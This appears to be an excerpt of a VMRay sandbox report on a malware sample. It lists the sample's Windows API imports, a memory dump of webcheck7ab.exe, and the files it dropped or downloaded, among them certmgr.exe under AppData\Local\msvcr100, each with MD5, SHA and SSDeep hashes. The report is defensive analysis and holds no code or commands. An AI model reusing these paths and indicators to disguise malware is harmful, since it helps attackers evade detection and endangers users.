GetSysColorBrush 0x0 0x4293ec 0x337b0 0x337b0 0x15b
DestroyMenu 0x0 0x4293f0 0x337b4 0x337b4 0x97
GetWindowThreadProcessId 0x0 0x4293f4 0x337b8 0x337b8 0x17b
GetForegroundWindow 0x0 0x4293f8 0x337bc 0x337bc 0x117
SetCursor 0x0 0x4293fc 0x337c0 0x337c0 0x24d
DrawFocusRect 0x0 0x429400 0x337c4 0x337c4 0xb3
SendMessageA 0x0 0x429404 0x337c8 0x337c8 0x23b
GetWindowRect 0x0 0x429408 0x337cc 0x337cc 0x174
RedrawWindow 0x0 0x42940c 0x337d0 0x337d0 0x215
GetParent 0x0 0x429410 0x337d4 0x337d4 0x145
EnableWindow 0x0 0x429414 0x337d8 0x337d8 0xc4
IsWindow 0x0 0x429418 0x337dc 0x337dc 0x1ad
GetSystemMetrics 0x0 0x42941c 0x337e0 0x337e0 0x15d
GetSysColor 0x0 0x429420 0x337e4 0x337e4 0x15a
PtInRect 0x0 0x429424 0x337e8 0x337e8 0x20c
GetClientRect 0x0 0x429428 0x337ec 0x337ec 0xff
InvalidateRect 0x0 0x42942c 0x337f0 0x337f0 0x193
SetCapture 0x0 0x429430 0x337f4 0x337f4 0x244
SystemParametersInfoA 0x0 0x429434 0x337f8 0x337f8 0x299
ReleaseCapture 0x0 0x429438 0x337fc 0x337fc 0x229
GetMessagePos 0x0 0x42943c 0x33800 0x33800 0x13c
RegisterClassA 0x0 0x429440 0x33804 0x33804 0x216
LoadCursorA 0x0 0x429444 0x33808 0x33808 0x1ba
GetSubMenu 0x0 0x429448 0x3380c 0x3380c 0x159
LoadIconA 0x0 0x42944c 0x33810 0x33810 0x1be
IsIconic 0x0 0x429450 0x33814 0x33814 0x1a6
GetSystemMenu 0x0 0x429454 0x33818 0x33818 0x15c
AppendMenuA 0x0 0x429458 0x3381c 0x3381c 0x8
DrawIcon 0x0 0x42945c 0x33820 0x33820 0xb6
IsRectEmpty 0x0 0x429460 0x33824 0x33824 0x1a9
DefWindowProcA 0x0 0x429464 0x33828 0x33828 0x8e
DispatchMessageA 0x0 0x429468 0x3382c 0x3382c 0xa1
GDI32.dll (41)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
PtVisible 0x0 0x429028 0x333ec 0x333ec 0x1f1
RectVisible 0x0 0x42902c 0x333f0 0x333f0 0x1f5
TextOutA 0x0 0x429030 0x333f4 0x333f4 0x24e
ExtTextOutA 0x0 0x429034 0x333f8 0x333f8 0xdd
Escape 0x0 0x429038 0x333fc 0x333fc 0xd4
SetViewportOrgEx 0x0 0x42903c 0x33400 0x33400 0x23f
OffsetViewportOrgEx 0x0 0x429040 0x33404 0x33404 0x1d5
SetViewportExtEx 0x0 0x429044 0x33408 0x33408 0x23e
ScaleViewportExtEx 0x0 0x429048 0x3340c 0x3340c 0x208
SetWindowExtEx 0x0 0x42904c 0x33410 0x33410 0x242
ScaleWindowExtEx 0x0 0x429050 0x33414 0x33414 0x209
DeleteDC 0x0 0x429054 0x33418 0x33418 0x8c
CreateBitmap 0x0 0x429058 0x3341c 0x3341c 0x27
SelectPalette 0x0 0x42905c 0x33420 0x33420 0x20f
GetObjectA 0x0 0x429060 0x33424 0x33424 0x195
DeleteObject 0x0 0x429064 0x33428 0x33428 0x8f
Rectangle 0x0 0x429068 0x3342c 0x3342c 0x1f6
MoveToEx 0x0 0x42906c 0x33430 0x33430 0x1d1
LineTo 0x0 0x429070 0x33434 0x33434 0x1cd
GetClipBox 0x0 0x429074 0x33438 0x33438 0x160
SetMapMode 0x0 0x429078 0x3343c 0x3343c 0x22b
SetTextColor 0x0 0x42907c 0x33440 0x33440 0x23c
SetBkMode 0x0 0x429080 0x33444 0x33444 0x216
SetBkColor 0x0 0x429084 0x33448 0x33448 0x215
RestoreDC 0x0 0x429088 0x3344c 0x3344c 0x200
SaveDC 0x0 0x42908c 0x33450 0x33450 0x207
BitBlt 0x0 0x429090 0x33454 0x33454 0x12
Pie 0x0 0x429094 0x33458 0x33458 0x1df
Ellipse 0x0 0x429098 0x3345c 0x3345c 0x94
SelectObject 0x0 0x42909c 0x33460 0x33460 0x20e
CreateCompatibleDC 0x0 0x4290a0 0x33464 0x33464 0x2d
CreateCompatibleBitmap 0x0 0x4290a4 0x33468 0x33468 0x2c
CreateFontA 0x0 0x4290a8 0x3346c 0x3346c 0x39
CreateSolidBrush 0x0 0x4290ac 0x33470 0x33470 0x50
GetStockObject 0x0 0x4290b0 0x33474 0x33474 0x1a5
GetTextExtentPoint32A 0x0 0x4290b4 0x33478 0x33478 0x1b4
RealizePalette 0x0 0x4290b8 0x3347c 0x3347c 0x1f3
GetDeviceCaps 0x0 0x4290bc 0x33480 0x33480 0x16b
CreatePalette 0x0 0x4290c0 0x33484 0x33484 0x45
CreateFontIndirectA 0x0 0x4290c4 0x33488 0x33488 0x3a
CreatePen 0x0 0x4290c8 0x3348c 0x3348c 0x47
WINSPOOL.DRV (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ClosePrinter 0x0 0x429470 0x33834 0x33834 0x1b
DocumentPropertiesA 0x0 0x429474 0x33838 0x33838 0x46
OpenPrinterA 0x0 0x429478 0x3383c 0x3383c 0x7d
ADVAPI32.dll (9)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegSetValueExA 0x0 0x429000 0x333c4 0x333c4 0x204
RegCreateKeyExA 0x0 0x429004 0x333c8 0x333c8 0x1d1
RegQueryValueA 0x0 0x429008 0x333cc 0x333cc 0x1f6
RegEnumKeyA 0x0 0x42900c 0x333d0 0x333d0 0x1dd
RegDeleteKeyA 0x0 0x429010 0x333d4 0x333d4 0x1d4
RegOpenKeyExA 0x0 0x429014 0x333d8 0x333d8 0x1ec
RegQueryValueExA 0x0 0x429018 0x333dc 0x333dc 0x1f7
RegOpenKeyA 0x0 0x42901c 0x333e0 0x333e0 0x1eb
RegCloseKey 0x0 0x429020 0x333e4 0x333e4 0x1cb
SHLWAPI.dll (2)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
PathFindFileNameA 0x0 0x429290 0x33654 0x33654 0x31
PathFindExtensionA 0x0 0x429294 0x33658 0x33658 0x2f
OLEAUT32.dll (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VariantClear 0x9 0x429280 0x33644 0x33644 -
VariantChangeType 0xc 0x429284 0x33648 0x33648 -
VariantInit 0x8 0x429288 0x3364c 0x3364c -
Icons (1)
»
Memory Dumps (1)
»
Name Process ID Start VA End VA Dump Reason PE Rebuild Bitness Entry Point AV YARA Actions
webcheck7ab.exe 15 0x00400000 0x00447FFF Relevant Image True 32-bit 0x0041D40B False False
C:\Users\aETAdzjz\AppData\Local\Temp\FC38.tmp Dropped File Text
Unknown
»
Mime Type text/plain
File Size 121 Bytes
MD5 4f7d90f045ae07792fb8d76bce925854 Copy to Clipboard
SHA1 c39b2866368f2c88c1865aa5577792bd2fb8bfe5 Copy to Clipboard
SHA256 df74b997137fec63589828cafa9df9bfe272b330ffb8743fa4db79096a0fdc34 Copy to Clipboard
SSDeep 3:q8CJGEIUEF7eSAMzr+WABEImBzEWVAZGXhRAJ1zKIC9iov:hCyUEZNiWSmBzNmeRAHCh Copy to Clipboard
ImpHash -
24a59c160127a2579c8873608c44da561c011958f7a6e811fd89778f4b7b4444 Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 140.63 KB
MD5 6f497b5539bdb42d71f487b6e9463840 Copy to Clipboard
SHA1 1a42f52d57b462b6ebd4184109f1ab8c607f56fe Copy to Clipboard
SHA256 24a59c160127a2579c8873608c44da561c011958f7a6e811fd89778f4b7b4444 Copy to Clipboard
SSDeep 3072:nWXd9i4h8PtwMuTVMrKN2TDXwk3Os2BDZU2+/:K8E8GMWMrKNMsbs2LD+/ Copy to Clipboard
ImpHash -
394b0fc779cd10347c01329f1651f2152c002bd38bab4b464eb9e169649a6c8e Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 96.21 KB
MD5 9f17c4bd8f9843bb2971d5c687e65fb3 Copy to Clipboard
SHA1 6feacefeac1d825775168868072061dcc51c926d Copy to Clipboard
SHA256 394b0fc779cd10347c01329f1651f2152c002bd38bab4b464eb9e169649a6c8e Copy to Clipboard
SSDeep 1536:afopauwyYQrGJslLKlMRlauAGzaiKNQEVhITZiKFp7EBjN9boXwk7d1/xkFVn/53:l7wOWsUmRlRzaiKNTUZiKFpVXD7piGbk Copy to Clipboard
ImpHash -
C:\Users\aETAdzjz\AppData\Local\msvcr100\certmgr.exe Downloaded File Binary
Unknown
»
Also Known As C:\Users\aETAdzjz\870.exe (Downloaded File)
byfHUU5i6.exe (Embedded File)
Parent File analysis.pcap
Mime Type application/vnd.microsoft.portable-executable
File Size 276.00 KB
MD5 d6a2c71a40e63dc747ed0d27a9aa7dc9 Copy to Clipboard
SHA1 d90dbdca5f74cc7cb6cef0ae391ff18f992ce1cf Copy to Clipboard
SHA256 4110a2697e0ed0e8990847f3828f9b0e4078cff2e423500f69ea0e35228afb28 Copy to Clipboard
SSDeep 6144:O9AZ0jbH3bYJfhShfyWkwh9kD8IL8bP2NuQjwUyYjDzFoS:aA+YJENyWeoIL8bPxUyZS Copy to Clipboard
ImpHash -
571939c7c2762e40e1db60316071765c91fb898b91180be7345dd19de7ace147 Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 132 Bytes
MD5 8e2669458e841c79adafd99ecefc23a1 Copy to Clipboard
SHA1 d498b0e28dcb351e54ce7beb86051e02d193948c Copy to Clipboard
SHA256 571939c7c2762e40e1db60316071765c91fb898b91180be7345dd19de7ace147 Copy to Clipboard
SSDeep 3:HdXiQ+G27eLnOasNsS56otXRYFaBmXyB/AcbCAEN9vln:E1G1LOaseS56oXoZv9vln Copy to Clipboard
ImpHash -
yhlkTUMlTEiHtvYNHBY Embedded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 1.11 KB
MD5 dd6ec36560f1b7fc8d7f557492aed6f5 Copy to Clipboard
SHA1 c822d839ac10530e264f64dc0f6c1a6ca974e0d1 Copy to Clipboard
SHA256 5791474e355ce6542cc21cf1c3aba2959c6a17cd17bea543c2ff1f6f90f5d054 Copy to Clipboard
SSDeep 24:7r5sIGjCL3ma23CaiZ/vLbR4CK+3yM1U4qOGWHvxyTk9v5h+6jO7tzdqYQJn8r:7r5shCP23o3RvKjlVekwa6Q+Yc8r Copy to Clipboard
ImpHash -
749ba93c96a6629ee9fcab60b20ea0fc157aecbfefc56608f4853bd7428cb665 Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 187.55 KB
MD5 f097a3cdc0f194114bbcb75a3171bb48 Copy to Clipboard
SHA1 13b5ec8ed03757d30ccdb1130f792d8ed02ae83e Copy to Clipboard
SHA256 749ba93c96a6629ee9fcab60b20ea0fc157aecbfefc56608f4853bd7428cb665 Copy to Clipboard
SSDeep 3072:6EzPDY+DeCCTEeCnUETRZq2tC1tQowkpaR8dM9ZEeaQLnyiklTj2QJ4nHnjG6Bzj:6EzPDPKV8joHtck0UOZE7QLnyi4j2PHr Copy to Clipboard
ImpHash -
93effaca5181bd6cc7aae18fa37135325307365bbc840e6a9eb07fa99f4bf943 Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 83.11 KB
MD5 d8561fbf41fd5b4b07e12e8f799d2de4 Copy to Clipboard
SHA1 9ba7b1c1fcab9e6865f23152c743968b37f4f48d Copy to Clipboard
SHA256 93effaca5181bd6cc7aae18fa37135325307365bbc840e6a9eb07fa99f4bf943 Copy to Clipboard
SSDeep 1536:zZzcXxKRAHiNCHwy4aEYqnouCHDkPDlrQoMPZG78tiUiTQhbNicJlsREr:Sx5iNCHX4a9qnvCjkPprQoMPU84UiTqp Copy to Clipboard
ImpHash -
ab8adc12f84134880ad134a59a16043b8a4e6498ece42fd7c03efec51367913f Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 315.93 KB
MD5 7b37450b816d1c40c54c55ccfd836272 Copy to Clipboard
SHA1 1daa618b2dbe06ef1cc012fcaa192e07f8ba1955 Copy to Clipboard
SHA256 ab8adc12f84134880ad134a59a16043b8a4e6498ece42fd7c03efec51367913f Copy to Clipboard
SSDeep 6144:nt+e1lhqM0IzvQsS+l5pOn3qKiTb+nJFo1C2eeHd8Vff4Ij+qwJ0IFP2CToGYLFk:tvlhYI/Sq5YRmbEJFo1seHif4I6lJrhF Copy to Clipboard
ImpHash -
bcbea49e37a6979eef59bc44dd6f9a9f24229e14969007ab0426a3e272c66670 Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 21.52 KB
MD5 0b86534256350fe3ad6b7bd7b4a56afe Copy to Clipboard
SHA1 f0a382e05cb9deb0f24f6503e26eba01e925aa34 Copy to Clipboard
SHA256 bcbea49e37a6979eef59bc44dd6f9a9f24229e14969007ab0426a3e272c66670 Copy to Clipboard
SSDeep 384:i9RVRqs835W/N+qeNAfBPt8H1H8m4uFuqq/wXW2o4ojhv1NbxmWTLguNu:uRVNa0V+qeNMLalR4uFuqCwXW2HYJHx6 Copy to Clipboard
ImpHash -
c4f25636a1586d8aea1b11d0ca4825c2bdfcb6d6f0e85e909fc02c7a05a4e715 Downloaded File Stream
Unknown
»
Parent File analysis.pcap
Mime Type application/octet-stream
File Size 139.21 KB
MD5 9c83d56d9091f4c732fec07c5b9c6e1b Copy to Clipboard
SHA1 19f4375ac1aca340617d999e3fc1b10e5a3a7eb0 Copy to Clipboard
SHA256 c4f25636a1586d8aea1b11d0ca4825c2bdfcb6d6f0e85e909fc02c7a05a4e715 Copy to Clipboard
SSDeep 3072:vLIDAjiSvUcA1ylbFnjViGBPybxK94pw0gCuifG+GAq/9JMe6:vTuSsk/exK942PAq716 Copy to Clipboard
ImpHash -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image